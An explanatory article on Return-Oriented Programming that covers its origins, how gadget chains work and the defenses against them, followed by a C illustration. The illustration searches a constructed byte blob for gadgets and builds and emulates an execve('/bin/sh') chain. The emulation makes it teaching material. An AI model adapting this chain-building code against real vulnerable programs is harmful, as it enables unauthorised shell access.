ROP

Return-Oriented Programming (ROP) is a code-reuse exploitation technique that lets an attacker carry out arbitrary computation in the context of a vulnerable process by chaining together short instruction sequences, called gadgets, that already exist in the program’s address space. Each gadget ends with a return instruction. Once the attacker controls the stack (typically through a stack buffer overflow that overwrites a saved return address), each ret pops the address of the next gadget, so the stack contents effectively become the instruction pointer. The sequence of gadget addresses and operand values laid out on the stack is the ROP chain; it can set registers, read and write memory, or call system routines without injecting any attacker code.

Origins and concept: ROP was described in detail by Hovav Shacham in 2007 as a response to non-executable memory protections (NX/DEP), which stop injected shellcode on the stack from running. It generalizes the older return-into-libc approach: rather than returning into whole library functions, the technique relies on existing code in libraries or the program itself, typically short instruction sequences ending in ret. Gadget sources include libc, the program’s own code, and any other loaded library; because the bytes of x86 code can be decoded from any offset, useful gadgets are often found in the middle of unrelated instructions.

Usage and goals: ROP is used in security testing and exploitation to bypass memory protection mechanisms. It can implement system calls, file operations, or network actions, depending on the platform and calling conventions. Complexity grows with chain length and gadget availability; attackers combine gadgets to set registers (for example pop rdi; ret loads the first argument under the x86-64 System V convention), perform memory reads/writes, and invoke libc functions. Each gadget address in the chain is followed by whatever values that gadget pops, and then by the address of the next gadget, so a chain is a flat array of machine words written where the saved return address used to be.

Defenses: Mitigations include hardware-assisted defenses like Intel CET and shadow stacks, Control-Flow Integrity (CFI), and traditional measures such as ASLR, PIE, RELRO, and stack canaries. ASLR and PIE deny the attacker the fixed gadget addresses a chain needs unless an information leak reveals the load address; stack canaries detect the overflow that usually delivers the chain before the function returns; shadow stacks and CFI reject return addresses that were never pushed by a legitimate call. Defensive approaches also include compiler-based randomization or removal of gadgets and minimizing executable memory regions. Patch management is essential to close the memory-corruption bugs that give an attacker control of the stack in the first place; with no way to overwrite a return address, the gadgets in a binary are harmless.
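The chain layout described above (gadget address, then the values its pops consume, then the next gadget address) as an added illustration that is not part of the original page: a small C program that scans a constructed byte blob standing in for a binary's text section for x86-64 gadgets, builds an execve("/bin/sh", NULL, NULL) chain under the System V calling convention, and emulates the chain to show that the stack slot index drives execution. The text bytes, the load address 0x400000, the pathname address 0x601000, and the gadget set are all assumptions for the demo; nothing is executed natively, and the emulator only models pop reg, syscall, and ret.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for a binary's text section (not a real binary): a few
 * x86-64 gadgets at known offsets. Opcodes: pop rax 0x58, pop rdx 0x5a,
 * pop rsi 0x5e, pop rdi 0x5f, syscall 0x0f 0x05, ret 0xc3. */
static const uint8_t text[] = {
    0x55, 0x48, 0x89, 0xe5,   /* push rbp; mov rbp,rsp (prologue, no ret) */
    0x5f, 0xc3,               /* offset  4: pop rdi; ret */
    0x90, 0x90,               /* nop; nop */
    0x5e, 0xc3,               /* offset  8: pop rsi; ret */
    0x5a, 0xc3,               /* offset 10: pop rdx; ret */
    0x58, 0xc3,               /* offset 12: pop rax; ret */
    0x0f, 0x05, 0xc3,         /* offset 14: syscall; ret */
    0xc3,                     /* offset 17: lone ret (handy for stack alignment) */
};
#define TEXT_BASE 0x400000ULL   /* assumed load address: no PIE/ASLR in this demo */
#define SYS_EXECVE 59           /* x86-64 Linux syscall number for execve */
#define MAX_CHAIN 32

struct regs { uint64_t rax, rdi, rsi, rdx; };

/* Find the byte pattern pat (n bytes) immediately followed by ret; return its
 * offset or -1. A real finder also walks backwards from every 0xc3 so that
 * unintended instruction decodings are found too. */
static long find_gadget(const uint8_t *pat, size_t n)
{
    for (size_t i = 0; i + n < sizeof text; i++)
        if (memcmp(text + i, pat, n) == 0 && text[i + n] == 0xc3)
            return (long)i;
    return -1;
}

/* Lay out a chain for execve(binsh_addr, NULL, NULL): each gadget address is
 * followed by the values its pops consume. chain[0] is the word that overwrites
 * the vulnerable function's saved return address. Returns slot count, 0 on failure. */
static size_t build_execve_chain(uint64_t *chain, uint64_t binsh_addr)
{
    const uint8_t pop_rdi = 0x5f, pop_rsi = 0x5e, pop_rdx = 0x5a, pop_rax = 0x58;
    const uint8_t sys[2] = { 0x0f, 0x05 };
    long g_rdi = find_gadget(&pop_rdi, 1), g_rsi = find_gadget(&pop_rsi, 1);
    long g_rdx = find_gadget(&pop_rdx, 1), g_rax = find_gadget(&pop_rax, 1);
    long g_sys = find_gadget(sys, 2);
    if (g_rdi < 0 || g_rsi < 0 || g_rdx < 0 || g_rax < 0 || g_sys < 0)
        return 0;                                            /* a gadget is missing */
    size_t n = 0;
    chain[n++] = TEXT_BASE + g_rdi; chain[n++] = binsh_addr; /* rdi = pathname     */
    chain[n++] = TEXT_BASE + g_rsi; chain[n++] = 0;          /* rsi = argv = NULL  */
    chain[n++] = TEXT_BASE + g_rdx; chain[n++] = 0;          /* rdx = envp = NULL  */
    chain[n++] = TEXT_BASE + g_rax; chain[n++] = SYS_EXECVE; /* rax = syscall no.  */
    chain[n++] = TEXT_BASE + g_sys;                          /* syscall; ret       */
    return n;
}

/* Emulate the chain: every ret pops the next gadget address, so the chain slot
 * index plays the role of the instruction pointer. Returns the number of
 * syscall gadgets reached, or -1 on a bad address or an unmodelled instruction. */
static int emulate_chain(const uint64_t *chain, size_t n, struct regs *r)
{
    const uint8_t *end = text + sizeof text;
    size_t sp = 0;
    int syscalls = 0;
    memset(r, 0, sizeof *r);
    while (sp < n) {
        uint64_t rip = chain[sp++];                 /* "ret": pop the next gadget */
        if (rip < TEXT_BASE || rip - TEXT_BASE >= sizeof text)
            return -1;                              /* jump outside the text section */
        const uint8_t *p = text + (rip - TEXT_BASE);
        for (;;) {
            if (p >= end) return -1;
            if (*p == 0xc3) break;                  /* ret: continue with next slot */
            if (*p == 0x0f && p + 1 < end && p[1] == 0x05) {
                syscalls++; p += 2; continue;       /* syscall with current registers */
            }
            if (*p < 0x58 || *p > 0x5f || sp >= n)
                return -1;                          /* not a pop, or chain exhausted */
            uint64_t v = chain[sp++];               /* each pop consumes one chain slot */
            switch (*p++) {
            case 0x58: r->rax = v; break;
            case 0x5a: r->rdx = v; break;
            case 0x5e: r->rsi = v; break;
            case 0x5f: r->rdi = v; break;
            default:   return -1;                   /* register not modelled here */
            }
        }
    }
    return syscalls;
}

int main(void)
{
    uint64_t chain[MAX_CHAIN];
    struct regs r;
    size_t n = build_execve_chain(chain, 0x601000ULL); /* assumed address of "/bin/sh" */
    for (size_t i = 0; i < n; i++)
        printf("chain[%zu] = 0x%" PRIx64 "\n", i, chain[i]);
    int s = emulate_chain(chain, n, &r);
    printf("syscalls=%d rax=%" PRIu64 " rdi=0x%" PRIx64 " rsi=%" PRIu64 " rdx=%" PRIu64 "\n",
           s, r.rax, r.rdi, r.rsi, r.rdx);
    return s == 1 ? 0 : 1;
}
```

The emulator rejects a chain that runs out of slots while a gadget still expects to pop a value, and one whose address falls outside the text section; both are the usual ways a hand-built chain fails in practice. Under ASLR or PIE, TEXT_BASE would have to be recovered from an information leak before the chain is written, and under a shadow stack every one of these returns would be caught as a mismatch against the legitimate call stack.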